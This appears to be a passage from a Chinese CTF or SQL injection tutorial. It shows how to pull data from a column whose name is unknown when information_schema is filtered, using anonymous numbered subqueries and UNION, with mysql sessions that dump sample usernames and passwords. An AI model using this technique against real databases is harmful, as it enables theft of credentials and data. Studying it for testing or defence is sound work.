存放flag的字段名未知���,information_schema.columns也將表名的hex過濾了�,即獲取不到字段名�����;這時可以利用聯合查詢����,過程如下:
mysql/198165.html">mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;+---+---+---+---+| a | b | c | d |+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;+---+-------+----------+-------------+| 1 | 2 | 3 | 4 |+---+-------+----------+-------------+| 1 | 2 | 3 | 4 || 1 | admin | admin888 | [email protected] || 2 | test | test123 | [email protected] || 3 | cs | cs123 | [email protected] |+---+-------+----------+-------------+4 rows in set (0.01 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;+-------------+| 4 |+-------------+| 4 || [email protected] || [email protected] || [email protected] |+-------------+4 rows in set (0.03 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3; +-------------+| 4 |+-------------+| [email protected] |+-------------+1 row in set (0.01 sec) mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)dunion select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;+-------------+----------+----------+-------------+| id | username | password | email |+-------------+----------+----------+-------------+| 1 | admin | admin888 | [email protected] || [email protected] | 1 | 1 | 1 |+-------------+----------+----------+-------------+2 rows in set (0.04 sec)
